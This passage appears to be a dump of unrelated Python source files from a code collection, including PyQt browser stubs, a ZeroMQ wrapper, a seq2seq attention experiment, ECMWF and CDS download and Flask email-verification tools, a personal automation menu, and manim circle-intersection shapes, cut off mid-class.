    This class is the base for a simple web browser
    Inherit from this class and override all the virtual methods
    to make a full functional browser
    """
    def __init__(self):
        BrowserGUI.__init__(self)
        self.connect(self.ui.tb_url, QtCore.SIGNAL("returnPressed()"), self.browse)
        self.connect(self.ui.tab_pages, QtCore.SIGNAL("tabCloseRequested(int)"), self.tab_closed)
        self.connect(self.ui.tab_pages, QtCore.SIGNAL("currentChanged(int)"), self.tab_changed)
    # overridable methods section
    # Fixed: the stubs below were declared without `self` (e.g. `def browse():`),
    # so Qt invoking them as bound slots would raise TypeError.
    def browse(self):
        """Override: load the URL typed in the address bar."""
        pass
    def tab_closed(self, index):
        """Override: handle the tab at *index* being closed."""
        pass
    def tab_changed(self, index):
        """Override: handle the current tab switching to *index*."""
        pass
    def add_tab(self):
        """Override: open a new browser tab."""
        pass
class BaseBrowserTab(BrowserTabGUI):
    """
    This class is the base for a browser tab
    Inherit from this class and override all the virtual methods
    to make a browser tab
    """
    def __init__(self, parent):
        BrowserTabGUI.__init__(self, parent)
        self.connect(self.parent.bt_back, QtCore.SIGNAL("clicked()"), self.back)
        self.connect(self.parent.bt_ahead, QtCore.SIGNAL("clicked()"), self.ahead)
        self.connect(self.parent.bt_reload, QtCore.SIGNAL("clicked()"), self.reload)
        self.connect(self.html, QtCore.SIGNAL("loadStarted()"), self.load_start)
        self.connect(self.html, QtCore.SIGNAL("loadFinished(bool)"), self.loaded_bar)
        self.connect(self.html, QtCore.SIGNAL("loadProgress(int)"), self.load_bar)
        self.connect(self.html, QtCore.SIGNAL("urlChanged(const QUrl)"), self.url_changed)
    # overridable methods section
    def load_start(self):
        """Override: a page load has started."""
        pass
    def load_bar(self):
        """Override: load progress changed."""
        pass
    def loaded_bar(self):
        """Override: page load finished."""
        pass
    def url_changed(self):
        """Override: the page URL changed."""
        pass
    def back(self):
        """Override: navigate back."""
        pass
    def ahead(self):
        """Override: navigate forward."""
        pass
    def reload(self):
        # Fixed: the original `def reload():` omitted `self`; the clicked()
        # signal invokes the bound method, which would raise TypeError.
        pass
|
15,932 | ac05aa863c772b14eeb932049dca608e163e0df5 | #增加留言
import requests
from AutoInterface.configs.config import HOST
from AutoInterface.lib.apiLib.login import Login
#1--封装类
class Msg:
    """Helper for the message-board API (creating messages)."""
    def add_msg(self, inToken, inData):
        '''
        :param inToken: token obtained from the login endpoint
        :param inData: request body for the new message
        :return: decoded JSON response body
        '''
        # POST the payload with the auth token; the body is sent as JSON.
        resp = requests.post(
            f'{HOST}/api/message',
            json=inData,
            headers={'X-AUTH-TOKEN': inToken, 'content-type': 'application/json'},
        )
        return resp.json()
if __name__ == '__main__':
    # 1. Log in first to obtain an auth token.
    token = Login().login({'username': '20154084', 'password': '123456'}, getToken=True)
    # 2. Call the message-creation endpoint with a sample payload.
    info = {'title': '留言标题sq', 'content': '留言内容'}
    res = Msg().add_msg(token, info)
    print(res)  # the returned message id can be used for later delete/reply calls
|
15,933 | 94ae40ea04b98126c8ae53453044addd10c357c3 | '''
Based on pyzmq-ctypes and pyzmq
Updated to work with latest ZMQ shared object
https://github.com/zeromq/pyzmq
https://github.com/svpcom/pyzmq-ctypes
'''
from zmq.bindings import *
from zmq.socket import *
from zmq.error import _check_rc, _check_ptr
import weakref
class Context(object):
    """Thin ctypes-backed wrapper around a ZeroMQ context
    (zmq_ctx_new / zmq_ctx_set / zmq_ctx_destroy)."""
    def __init__(self, io_threads=1):
        # ZMQ requires a strictly positive I/O thread count.
        if not io_threads > 0:
            raise ZMQError(EINVAL)
        self.handle = zmq_ctx_new()
        _check_ptr(self.handle)
        zmq_ctx_set(self.handle, IO_THREADS, io_threads)
        self._closed = False
        # Weak references to every Socket created from this context so that
        # destroy() can close them without keeping them alive.
        self._sockets = set()
    @property
    def closed(self):
        # True once term() has completed.
        return self._closed
    def _add_socket(self, socket):
        # Track a socket weakly; return the weakref so the socket can unregister itself.
        ref = weakref.ref(socket)
        self._sockets.add(ref)
        return ref
    def _rm_socket(self, ref):
        # Drop a previously registered socket weakref (no-op if unknown).
        if ref in self._sockets:
            self._sockets.remove(ref)
    def term(self):
        """Destroy the underlying ZMQ context and mark this wrapper closed."""
        rc = zmq_ctx_destroy(self.handle)
        try:
            _check_rc(rc)
        except InterruptedSystemCall:
            # ignore interrupted term
            # see PEP 475 notes about close & EINTR for why
            pass
        self.handle = None
        self._closed = True
    def destroy(self, linger = 0):
        """Close every still-open socket (with *linger*) and then terminate."""
        if self.closed:
            return
        sockets = self._sockets
        self._sockets = set()
        for s in sockets:
            s = s()  # dereference the weakref; None if the socket was GC'd
            if s and not s.closed:
                if linger is not None:
                    s.setsockopt(LINGER, linger)
                s.close()
        self.term()
    def socket(self, kind):
        """Create a new Socket of *kind* bound to this context."""
        if self._closed:
            raise ZMQError(ENOTSUP)
        return Socket(self, kind)
|
15,934 | 56b3c753e950ebb6592d26c5e14f96f673bbb006 | import torch
from torch import nn
import os
import pickle as pkl
import numpy as np
from typing import List
import random
# ---- experiment configuration ----
exp_name = 'all_comb'
exp_dir = exp_name
save_result_dir = exp_dir + '/results/'
num_vocab = 40                     # token ids 0..39
end_of_sequence = num_vocab        # EOS token id (40)
start_of_sequence = num_vocab + 1  # SOS token id (41)
seq_length = 40
device = 'cuda' if torch.cuda.is_available() else 'cpu'
experiment_num_heads = 20          # how many 'good'/'bad' heads init() collects
NUM_TRIALS = 5
num_samples = 50                   # head combinations sampled per category in run()
num_heads = 8                      # heads per combination
def count_parameters(model):
    """Number of trainable (requires_grad) scalar parameters in *model*."""
    total = 0
    for param in model.parameters():
        if param.requires_grad:
            total += param.numel()
    return total
# Registry of metric functions, keyed by metric name.
metrics = {}
def register_metrics(metric_name):
    """Decorator factory: register the decorated function in `metrics` under
    *metric_name* and return the function itself.

    Bug fixed: the original decorator did not return `f`, so the decorated
    module-level names (acc, attn_acc, ...) were not bound to the metric
    functions even though the registry itself was populated.
    """
    def decorator(f):
        metrics[metric_name] = f
        return f
    return decorator
@register_metrics('acc')
def acc(return_dict, X, Y):
    """Mean token accuracy: greedy argmax over probs vs. gold tokens Y[:, 1:]."""
    predictions = return_dict['probs'].argmax(axis=-1)
    gold = Y[:, 1:].cpu().numpy()
    return np.mean(predictions == gold)
@register_metrics('attn_acc')
def attn_acc(return_dict, X, Y):
    """Per-head fraction of decoder steps whose argmax attention lands on
    source position t (identity alignment)."""
    batch = X.size()[0]
    target = np.tile(np.arange(seq_length), (batch, 1))
    accs = []
    for head_weights in return_dict['attn_weights']:
        picked = np.argmax(head_weights, axis=-1)[:, :-1]
        accs.append(np.mean(np.equal(picked, target)))
    return accs
@register_metrics('attn_acc_m1')
def attn_acc_m1(return_dict, X, Y):
    """Per-head fraction of decoder steps whose argmax attention lands on
    source position t+1 (one-ahead alignment)."""
    batch = X.size()[0]
    target = np.tile(np.arange(1, seq_length + 1), (batch, 1))
    accs = []
    for head_weights in return_dict['attn_weights']:
        picked = np.argmax(head_weights, axis=-1)[:, :-1]
        accs.append(np.mean(np.equal(picked, target)))
    return accs
def numpify_dict(d):
    """Detach every tensor in a model-output dict to host numpy arrays."""
    def to_np(t):
        return t.cpu().detach().numpy()
    return {
        'logits': to_np(d['logits']),
        'probs': to_np(d['probs']),
        'attn_weights': [to_np(w) for w in d['attn_weights']],
    }
def eval_acc(m, val_set):
    """Evaluate model *m* on *val_set* with every registered metric.

    Runs the forward pass in eval mode and restores train mode before
    returning the {metric name: value} dict.
    """
    X_arr, Y_arr = val_set
    X = torch.tensor(X_arr).to(device)
    Y = torch.tensor(Y_arr).to(device)
    m.eval()
    outputs = numpify_dict(m(X, Y[:, :-1]))
    results = {name: metric(outputs, X, Y) for name, metric in metrics.items()}
    m.train()
    return results
def generate_seq(num_samples):
    """Sample *num_samples* training pairs.

    Each X row is a random permutation prefix of the vocabulary followed by
    EOS; each Y row is the same sequence prefixed with SOS (teacher forcing).
    """
    xs, ys = [], []
    for _ in range(num_samples):
        vocab = list(range(num_vocab))
        random.shuffle(vocab)
        body = np.array(vocab[:seq_length])
        x = np.concatenate((body, [end_of_sequence]))
        xs.append(x)
        ys.append(np.concatenate(([start_of_sequence], x)))
    return np.array(xs), np.array(ys)
# Ensure the experiment and results directories exist before anything is saved.
if not os.path.exists(exp_dir):
    os.mkdir(exp_dir)
if not os.path.exists(save_result_dir):
    os.mkdir(save_result_dir)
class Attn_head(nn.Module):
    """One attention head: a decoder-side query projection and an
    encoder-side context projection, optionally restored from disk."""
    def __init__(self, save_path=None):
        super(Attn_head, self).__init__()
        # hidden_dim is a module-level constant (resolved at instantiation time).
        self.attn_proj = nn.Linear(hidden_dim, hidden_dim)
        self.enc_proj = nn.Linear(hidden_dim, hidden_dim)
        if save_path is not None:
            self.load_state_dict(torch.load(save_path))
class Seq2Seq(nn.Module):
    """GRU encoder-decoder with pluggable mean-pooled attention heads
    (see set_attn)."""
    def __init__(self):
        super(Seq2Seq, self).__init__()
        # Separate embeddings for encoder input and decoder input; +2 covers EOS/SOS.
        self.enc_embedding, self.dec_embedding = [nn.Embedding(num_vocab + 2, hidden_dim) for _ in range(2)]
        self.encoder_rnn, self.decoder_rnn = [nn.GRU(hidden_dim, hidden_dim) for _ in range(2)]
        self.out_lin = nn.Linear(hidden_dim, num_vocab + 2)
        self.sm = nn.Softmax(dim=-1)
        # Projects [context; decoder state] back down to hidden_dim.
        self.after_decoder_hidden = nn.Linear(hidden_dim * 2, hidden_dim)
        self.act = nn.Tanh()
    def set_attn(self, attn_heads: List[Attn_head]):
        # Install the attention heads to be averaged in forward().
        self.attn_heads = nn.ModuleList(attn_heads)
        self.num_heads = len(attn_heads)
    def forward(self, X, Y_in):
        """Teacher-forced forward pass; X, Y_in are (batch, time) int tensors."""
        # Transpose to (time, batch) for the seq-first GRUs.
        X, Y_in = X.T, Y_in.T
        enc_emb, dec_emb = self.enc_embedding(X), self.dec_embedding(Y_in)
        encoder_hidden, last = self.encoder_rnn(enc_emb)
        decoder_hidden, _ = self.decoder_rnn(dec_emb, last)
        # Per head: project decoder states, score against encoder states
        # (t,b,f)x(s,b,f) -> (b,t,s), softmax over source positions.
        attn_feats = [attn_head.attn_proj(decoder_hidden) for attn_head in self.attn_heads]
        attn_distrs = [self.sm(torch.einsum("tbf,sbf->bts", [attn_feat, encoder_hidden])) for attn_feat in attn_feats]
        # Weighted sums of encoder states: (b,t,s)x(s,b,f) -> (t,b,f).
        context_vs = [torch.einsum("bts,sbf->tbf", [attn_distr, encoder_hidden]) for attn_distr in attn_distrs]
        all_context = torch.cat([attn_head.enc_proj(context_v).unsqueeze(0) for context_v, attn_head in zip(context_vs, self.attn_heads)], axis=0)
        # Average head contexts, then fuse with the decoder state.
        context_v_agg = torch.mean(all_context, axis=0)
        last_hidden = self.act(self.after_decoder_hidden(torch.cat((context_v_agg, decoder_hidden), dim=-1)))
        # Back to (batch, time, vocab) for the loss/metrics.
        logits = self.out_lin(last_hidden).transpose(1, 0)
        return {
            "logits": logits,
            "probs": self.sm(logits),
            "attn_weights": attn_distrs
        }
# ---- training hyper-parameters ----
bsize = 128
hidden_dim = 256
num_steps = 200
eval_every = 10
val_set = generate_seq(400)  # fixed held-out set shared by all runs
model_path = exp_dir + '/model.pt'  # shared base-model initialization
def can_learn(m, seed, return_history=False):
    """Train *m* for up to num_steps and judge whether it learns the task.

    Returns "good" on early success (val acc > 0.95), "bad" if the final
    checkpointed accuracy is < 0.6, None if inconclusive; when
    return_history is True, returns the list of periodic eval dicts instead.
    """
    # optimizer
    optim = torch.optim.Adam(m.parameters())
    loss_func = nn.CrossEntropyLoss()
    random.seed(seed)
    history = []
    for step in range(num_steps):
        if step % eval_every == 0:
            # Periodic evaluation on the shared validation set.
            eval_dict = eval_acc(m, val_set)
            dat = {k: v for k, v in eval_dict.items()}
            dat['step'] = step
            last_acc = dat['acc']
            print(dat)
            history.append(dat)
            if last_acc > 0.95 and not return_history:
                return "good"
        # One SGD step on a fresh random batch.
        X, Y = generate_seq(bsize)
        X, Y = torch.tensor(X).to(device), torch.tensor(Y).to(device)
        return_dict = m(X, Y[:, :-1])
        # CrossEntropyLoss wants (batch, classes, time).
        loss = loss_func(return_dict['logits'].permute(0, 2, 1), Y[:, 1:])
        loss.backward()
        optim.step()
        optim.zero_grad()
    if not return_history:
        if last_acc < 0.6:
            return "bad"
        return None
    return history
def get_fresh_model(attn_list):
    """Build a Seq2Seq from the shared saved initialization and attach the
    attention heads loaded from the given state-dict paths."""
    model = Seq2Seq()
    model.load_state_dict(torch.load(model_path))
    model.set_attn([Attn_head(attn) for attn in attn_list])
    model = model.to(device)
    return model
def is_good_single_head(attn):
    """Classify a saved single head as 'good' or 'bad'.

    Trains three fresh models (seeds 0-2), each using only this head.
    Returns the shared verdict when all three runs agree; None when any
    run is inconclusive or the runs disagree.
    """
    verdict = None
    for seed in range(3):
        outcome = can_learn(get_fresh_model([attn]), seed)
        if outcome is None:
            return None
        if verdict is None:
            verdict = outcome
        elif verdict != outcome:
            return None
    return verdict
def is_good_comb(attn_list, return_history):
    # Train one model (seed 0) from the shared init with this head combination.
    return can_learn(get_fresh_model(attn_list), 0, return_history=return_history)
def init():
    """Save a shared base-model init, then sample random heads until
    experiment_num_heads 'good' and 'bad' heads have each been collected."""
    model = Seq2Seq()
    torch.save(model.state_dict(), model_path)
    good_count, bad_count = 0, 0
    while bad_count < experiment_num_heads or good_count < experiment_num_heads:
        # Draw a fresh random head and persist it so it can be re-loaded later.
        attn = Attn_head()
        cur_path = 'cur.pt'
        torch.save(attn.state_dict(), cur_path)
        head_init_property = is_good_single_head(cur_path)
        if head_init_property == 'good':
            print('A good head found')
            if good_count < experiment_num_heads:
                os.rename(cur_path, exp_dir + '/goodattn%d.pt' % good_count)
                good_count += 1
        elif head_init_property == 'bad':
            print('A bad head found')
            if bad_count < experiment_num_heads:
                os.rename(cur_path, exp_dir + '/badattn%d.pt' % bad_count)
                bad_count += 1
        # Inconclusive heads (and surplus good/bad ones) are discarded.
        if os.path.exists(cur_path):
            os.unlink(cur_path)
    print('init finished')
def run():
    """Compare training histories for three kinds of head combinations:
    all-bad, (num_heads-1) bad + 1 good, and all-random; pickle results."""
    # Persist a pool of freshly initialized random heads.
    random_samples = 30
    random_attns = []
    for random_idx in range(random_samples):
        attn = Attn_head()
        path = exp_dir + '/randomattn%d.pt' % random_idx
        random_attns.append(path)
        torch.save(attn.state_dict(), path)
    bad_attns = [exp_dir + '/badattn%d.pt' % idx for idx in range(experiment_num_heads)]
    good_attns = [exp_dir + '/goodattn%d.pt' % idx for idx in range(experiment_num_heads)]
    good_histories, bad_histories, random_histories = {}, {}, {}
    for idx in range(num_samples):
        # Distinct seeds per category keep the samples reproducible.
        random.seed(3 * idx)
        random.shuffle(bad_attns)
        comb = tuple(bad_attns[:num_heads])
        bad_histories[comb] = is_good_comb(comb, return_history=True)
        random.seed(3 * idx + 1)
        random.shuffle(bad_attns)
        random.shuffle(good_attns)
        comb = tuple(bad_attns[:num_heads - 1] + good_attns[:1])
        good_histories[comb] = is_good_comb(comb, return_history=True)
        random.seed(3 * idx + 2)
        random.shuffle(random_attns)
        comb = tuple(random_attns[:num_heads])
        random_histories[comb] = is_good_comb(comb, return_history=True)
    # Fixed: the original passed a bare open() handle to pkl.dump, leaking
    # the file descriptor; `with` guarantees the file is flushed and closed.
    with open('re_%dheadcomb.pkl' % num_heads, 'wb') as out_file:
        pkl.dump((bad_histories, good_histories, random_histories), out_file)
def all_bad(key):
    """Return True iff every path in *key* names a 'bad' attention head."""
    return all('bad' in k for k in key)
if __name__ == '__main__':
    # Collect good/bad heads first, then evaluate head combinations.
    init()
    run()
|
15,935 | a7ac7f33ea3c191b5af8ad0b74dc94a468efacd0 | import click
from src.model_data_retriever.ecmwf_request import ecmwfRetriever
from src.model_data_retriever.cds_request import cdsRetriever
from src.tools.data_tools import dataTools
@click.command()
@click.argument(
    'request-file',
    type=click.Path(exists=True))
@click.option(
    '--dates',
    '-d',
    nargs=2,
    type=str,
    help= "date_begin and date_end of request. If not provided application will use date field from request file."
)
@click.option(
    '--week_filter',
    '-wf',
    multiple=True,
    type=str,
    # Fixed: the original help text was the truncated string "If".
    help= "Optional week-day filter(s) for the date generator; may be passed multiple times."
)
@click.option(
    # Fixed: was '-parallel' (single dash), so the conventional '--parallel'
    # spelling was not accepted by click.
    '--parallel',
    '-p',
    is_flag=True,
    help= "If passed, parallel processing is applied."
)
@click.option(
    '--num-cores',
    '-nc',
    # Fixed: show_default without a default displayed nothing; 2 matches the
    # fallback the code already used.
    default=2,
    show_default=True,
    type=int,
    help= "Number of cpu cores to be used in application"
)
@click.option(
    '--mode',
    # Fixed: click always supplies this parameter, so the default must be
    # declared here -- the signature default alone was never applied and an
    # omitted --mode previously arrived as None, hitting the error branch.
    default='ecmwf',
    show_default=True,
    type=str,
    help= "Select ECMWF api or CDS api."
)
def main(request_file: str, dates: str, week_filter: str, parallel: bool, num_cores: int, mode: str = "ecmwf"):
    """
    Python CLI tool to download data from ECMWF's mars web api.

    To use the program you should provide a path to a json file with one or
    more data requests in valid MARS or CDS format, e.g.:

    \b
    "request_config_0": {
        "class": "s2", "dataset": "s2s",
        "date": "2021-03-01/2021-03-04/.../2021-03-29",
        "expver": "prod", "levtype": "sfc", "model": "glob",
        "origin": "ecmf", "param": "228228", "step": "",
        "stream": "enfo", "time": "00:00:00", "type": "cf",
        "area": "5/-90/-60/-30", "target": "output"
    },
    "request_config_2": {
        "originating_centre": "ukmo", "system": "600",
        "variable": "total_precipitation",
        "year": "2021", "month": "09", "day": "01",
        "leadtime_hour": ["24", "48", "72", "...", "5160"],
        "area": [15, -90, -60, 30],
        "format": "grib"
    }

    More info on how to get a valid ECMWF data request on:
    https://www.ecmwf.int/en/forecasts/access-forecasts/ecmwf-web-api

    Usage example:
    downloader.py <path-to-request-file>
    """
    try:
        print("File downloader is being initialized.")
        tools = dataTools()
        config_dict = tools.load_config_file(request_file)
        if (mode == 'ecmwf'):
            retriever = ecmwfRetriever()
            if (dates):
                click.echo(f'Date generator enabled. date_begin [{dates[0]}], date_end [{dates[1]}].')
                if (week_filter):
                    click.echo(f'week_filter enabled: {list(week_filter)}')
                    # NOTE(review): with a week filter the provided dates are not
                    # forwarded to generate_dates() -- confirm this is intended.
                    date_list = tools.generate_dates(week_filter=list(week_filter))
                else:
                    date_list = tools.generate_dates(dates[0], dates[1])
            else:
                dates = [None, None]
                date_list = None
            if (parallel):
                click.echo('Parallel processing enabled.')
                if (num_cores):
                    click.echo(f'Using {str(num_cores)} cores.')
                    retriever.parallel_retrieve(config_dict, num_cores=num_cores, date_begin=dates[0], date_end=dates[1], date_list=date_list)
                else:
                    # Fixed: this branch previously echoed the unset num_cores
                    # ("Using None cores.") while actually using 2.
                    click.echo('Using 2 cores.')
                    retriever.parallel_retrieve(config_dict, date_begin=dates[0], date_end=dates[1], date_list=date_list, num_cores=2)
            else:
                click.echo('Sequential processing enabled.')
                retriever.sequential_retrieve(config_dict)
        elif (mode == 'cds'):
            retriever = cdsRetriever()
            if (dates):
                click.echo(f'Date generator enabled. date_begin [{dates[0]}], date_end [{dates[1]}].')
            else:
                dates = [None, None]
            if (parallel):
                click.echo('Parallel processing enabled.')
                if (num_cores):
                    click.echo(f'Using {str(num_cores)} cores.')
                    retriever.parallel_retrieve(config_dict, num_cores=num_cores, date_begin=dates[0], date_end=dates[1])
                else:
                    click.echo('Using 2 cores.')
                    retriever.parallel_retrieve(config_dict, num_cores=2, date_begin=dates[0], date_end=dates[1])
            else:
                click.echo('Sequential processing enabled.')
                retriever.sequential_retrieve(config_dict)
        else:
            raise TypeError(f'Mode should be either ecmwf or cds. got mode = {mode}. ')
    except Exception as general_error:
        # Broad catch at the CLI boundary keeps tracebacks away from users.
        print(f'Error: {general_error}')
if __name__ == "__main__":
    main()
|
15,936 | 758d7f090c7616e495c1d12c83ebfdd378905345 | from Google import send_message
from ml_tracker import price_tracker
from cli import drawMenuScreen, drawConfigScreen, drawHelpScreen
from dotenv import load_dotenv
from bt_hours import weekly_check_hours
from conf import config_env_file
import os
def env_data_inputs():
    """Interactively prompt for the .env settings, persist them via
    config_env_file() and return them as a 4-tuple."""
    print(drawConfigScreen())
    MY_MAIL = input("Por favor ingresa el correo en el que deseas recibir las notificaciones: ")
    WEBDRIVERPATH = input("Por favor, ingresa el nombre de tu chromedriver (recuerda que debe estar en la misma carpeta del proyecto): ")
    BIG_TIME_USER = input("Por favor, ingresa tu usuario de Big Time: ")
    BIG_TIME_PASSWORD = input("Por favor, ingresa tu contraseña de Bit Time: ")
    config_env_file(MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD)
    return MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD
def main():
    """Interactive menu loop: price tracking (1), send mail (2), Big Time
    hour registration (3), reconfigure (c), help (h), quit (s)."""
    option = 1
    load_dotenv()
    try:
        MY_MAIL = os.environ['MY_MAIL']
        WEBDRIVERPATH = os.environ['WEBDRIVERPATH']
        BIG_TIME_USER = os.environ['BIG_TIME_USER']
        BIG_TIME_PASSWORD = os.environ['BIG_TIME_PASSWORD']
    except KeyError:
        # Fixed: was a bare `except:`, which also swallowed KeyboardInterrupt
        # and SystemExit; os.environ lookups only raise KeyError.
        MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD = env_data_inputs()
    while option != "s":
        print(drawMenuScreen())
        option = input("Ingresa la opción deseada: ")
        if option == "1":
            # Track a product's price and notify by mail when the condition holds.
            url = input("Ingresa el url de tu producto: ")
            amount = float(input("Ingresa el monto a buscar: "))
            condition = input("Ingresa el operador booleano de búsqueda (precio real [opeador] precio deseado): ")
            mail = input("Ingresa el correo para notificar: ")
            if mail == 'me':
                mail = MY_MAIL
            result = price_tracker(url, condition, amount, WEBDRIVERPATH)
            if result:
                send_message(mail, result[1], result[2])
        elif option == "2":
            # Send an arbitrary e-mail.
            to = input("Ingresa el correo del destinatario: ")
            subject = input("Ingresa el asunto del correo: ")
            message_text = input("Ingresa el cuerpo del mensaje: ")
            send_message(to, subject, message_text)
        elif option == "3":
            # Register weekly Big Time hours and report the outcome by mail.
            if weekly_check_hours(BIG_TIME_USER, BIG_TIME_PASSWORD, WEBDRIVERPATH):
                subject = "Horas registradas y enviadas correctamente"
                message_text = "Me complace informarte que he cumplico con la tarea de registrar y enviar tus 40 horas de esta semana en Big Time"
            else:
                subject = "Tuve un error al registrar y enviar tus horas ¡CUIDADO!"
                message_text = "Lamento informarte que tuve un problema al registrar y enviar tus horas, esta semana necesitarás revisarlo manualmente<br/>Puedes acceder dando clic al siguiente enlace <a href='https://intuit.bigtime.net/Bigtime/MyAccount/Session/Login'>Ir a Big Time</a><br/>O puedes copiar y pegar el siguiente enlace en tu navegador para acceder: https://intuit.bigtime.net/Bigtime/MyAccount/Session/Login"
            send_message(MY_MAIL, subject, message_text)
        elif option == "c":
            # Re-run the interactive configuration.
            MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD = env_data_inputs()
        elif option == "h":
            print(drawHelpScreen())
        elif option == "s":
            print("Un placer atenderte, vuelve pronto!")
        else:
            option = "1"
            print("Opción inválida, favor de ingresar una opción válida")
main()
|
15,937 | 109c3a002c54666904ff132ea5725ca7800afe79 | #!/usr/bin/env python
import os.path,sys
sys.path.insert(0,os.path.join(os.path.dirname(__file__),'lib'))
from model.user import User
from lib import db_engine
from controller import main,factory,resource,log,configuration
import cherrypy
#initial Configuration for Vserver-GUI
config = os.path.join(os.path.dirname(__file__),'vserver-gui.conf')
cherrypy.config.update({
'global' : {
'tools.staticdir.root' : os.path.realpath(os.path.dirname(__file__)),
}
})
root = main.Controller()
root.setting = main.Controller()
root.factory = factory.Controller()
root.resource = resource.Controller()
root.configuration = configuration.Controller()
root.log = log.Controller()
cherrypy.quickstart(root, config=config)
|
15,938 | ffa1060bbcadd98fbb5b641754758d1fe63922d1 | from django.db.models.signals import post_save
from django.dispatch import receiver
from andr_omeda.andr_bot.models.bot import Bot
from andr_omeda.andr_bot.tasks import async_set_webhook
|
15,939 | 03913b5253818f2b4fe19421c6ef72c3b26e73fe | # models.py
from db import db
from sqlalchemy import and_
# ORM model mapped to the `user_list` table.
class User(db.Model):
    # table name
    __tablename__ = 'user_list'
    # primary key
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(255),)
    password = db.Column(db.String(255),)
    # Printable representation of the object (like Java's toString).
    def __repr__(self):
        return '<User 用户名:%r 密码:%r>' % (self.username, self.password)# database operations below
# Create: insert a user row and commit.
def add_object(user):
    db.session.add(user)
    db.session.commit()
    # BUG FIX: the original passed the bound method `user.__repr__` without
    # calling it, so %r printed "<bound method ...>"; passing the instance
    # lets the %r conversion call repr() itself.
    print("添加 % r 完成" % user)
# Read: query users matching both username and password.
# (requires `from sqlalchemy import and_` when combining conditions)
def query_object(user, query_condition_u, query_condition_p):
    result = user.query.filter(and_(user.username == query_condition_u, user.password == query_condition_p))
    # BUG FIX: %r was given the uncalled bound method `user.__repr__`;
    # pass the object so %r invokes repr() on it.
    print("查询 % r 完成" % user)
    return result
# Delete: remove all users with the hard-coded test username.
def delete_object(user):
    results = user.query.filter(user.username == '11111').all()
    # BUG FIX: .all() returns a list, and Session.delete() accepts a single
    # mapped instance — passing the list raised an error. Delete row by row.
    for row in results:
        db.session.delete(row)
    db.session.commit()
# Update: change the title of users with the hard-coded test username.
def update_object(user):
    results = user.query.filter(user.username == '111111').all()
    # BUG FIX: .all() returns a list; assigning `result.title` on the list
    # raises AttributeError and nothing was ever committed. Set the field on
    # each row and commit so the change is persisted.
    # NOTE(review): the User model above declares no 'title' column — confirm
    # the intended field name.
    for row in results:
        row.title = 'success2018'
    db.session.commit()
|
15,940 | c236c12e50caac63526242e6e31376ba219fdaf9 | from .decorators import captchaform
from . import settings
# A simple shortcut/"default" field name for the captcha
captcha = captchaform(settings.DEFAULT_FIELD_NAME)
|
15,941 | 5088a387dd1abc225a24cece252095c2b77e446d | from flask import Flask, request, make_response
from verify_email import VerifyEmail
import json
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
'''
Http请求方式 POST
Content-Type application/json
传参格式(Http流传输):
[
"zhzhi2008@126.com",
"529781013@qq.com",
"2121kk@toytoystimple.net"
]
'''
@app.route('/verify/email', methods=['POST'])
def verify_email():
data = request.stream.read()
v = VerifyEmail(json.loads(data))
list = v.verify()
resp = make_response(json.dumps(list))
resp.headers['content-type'] = 'application/json'
return resp
@app.route('/verify/wrongemail', methods=['POST'])
def wrong_demain():
data = request.stream.read()
v = VerifyEmail(json.loads(data))
list = v.wrong_demain()
resp = make_response(json.dumps(list))
resp.headers['content-type'] = 'application/json'
return resp
if __name__ == '__main__':
app.run()
|
15,942 | d0cd6f49f2dc7fe56fb7efc7baa42caaab7fce09 | # _*_ coding utf-8 _*_
# __author: Jason
# Date: 2018/12/20
'''
按逗号分隔列表。
'''
L = [1,2,3,4,5]
#利用JOIN将通过迭代器生成的字符串进行拼接
s1 = ','.join(str(n) for n in L)
print(s1)
print(type(s1))
L = [1, 2, 3, 4, 5]
L = repr(L)[1:-1]
print(L)
print(type(L)) |
15,943 | b64e9fea26ec95f03db1e430f8bdc38f8c5d31a3 | # from @cigar666
"""
注:
1. 主要用来求解两圆和多圆相交的交集部分的示意(如果是空集会出问题)
2. Intersection_n_circle是没有基于前两个类的,其实就用它也就行了
3. 可以用来做一些类似文氏图之类的,其他凸区域的交集可使用类似的方法写出来(如果谁有兴趣可以写一下)
"""
from manimlib.imports import *
class Irregular_shape(VMobject):
    """Closed polygonal VMobject built from one or more point sequences.

    Each element of *curves* is an iterable of 3D points; all points are
    concatenated in order and the outline is closed back to the first vertex.
    """
    def __init__(self, *curves, **kwargs):
        VMobject.__init__(self, **kwargs)
        vertices = []
        for curve in curves:
            vertices += list(curve)
        # close the polygon by repeating the first vertex
        self.set_points_as_corners(
            [*vertices, vertices[0]]
        )
class Intersection_2circle(Irregular_shape):
    """Region showing the intersection of two circles.

    Samples `num` points on each circle and keeps those lying inside the
    other circle; the two arcs are then joined into one closed outline.
    Note: result is undefined if the circles do not overlap (empty arcs).
    """
    def __init__(self, Mcircle_1, Mcircle_2, num=360, **kwargs):
        def p_in_circle(p, circle_o, circle_r):
            # True if point p lies inside (or on) the circle (o, r)
            return (sum((p - circle_o) ** 2) <= circle_r ** 2)
        r1, r2 = Mcircle_1.get_height()/2, Mcircle_2.get_height()/2
        o1, o2 = Mcircle_1.get_center(), Mcircle_2.get_center()
        arc1, arc2 = [], []
        t = np.linspace(0, 2 * np.pi, num)
        for i in range(len(t)):
            p1 = np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r1 + o1
            if p_in_circle(p1, o2, r2):
                arc1.append(p1)
            p2 = np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r2 + o2
            if p_in_circle(p2, o1, r1):
                # BUG FIX: points sampled on circle 2 belong to arc2 (they were
                # appended to arc1, interleaving the arcs and corrupting the
                # outline; the commented-out draft above shows the intent).
                arc2.append(p2)
        Irregular_shape.__init__(self, arc1, arc2, **kwargs)
class Intersection_n_circle(VMobject):
    """Region showing the common intersection of n circles.

    Samples `num` points on each circle, keeps those lying inside ALL
    circles, then sorts the surviving points by polar angle around their
    centroid to form a closed outline. Result is undefined for an empty
    intersection (division by zero when n_v == 0).
    """
    def __init__(self, *Mcircle, num=360, **kwargs):
        def p_in_circle(p, circle_o, circle_r):
            # True if point p lies inside (or on) the circle (o, r)
            return (sum((p - circle_o) ** 2) <= circle_r ** 2)
        r_list = [c.get_height()/2 for c in Mcircle]
        o_list = [c.get_center() for c in Mcircle]
        arc_list = [[] for c in Mcircle]
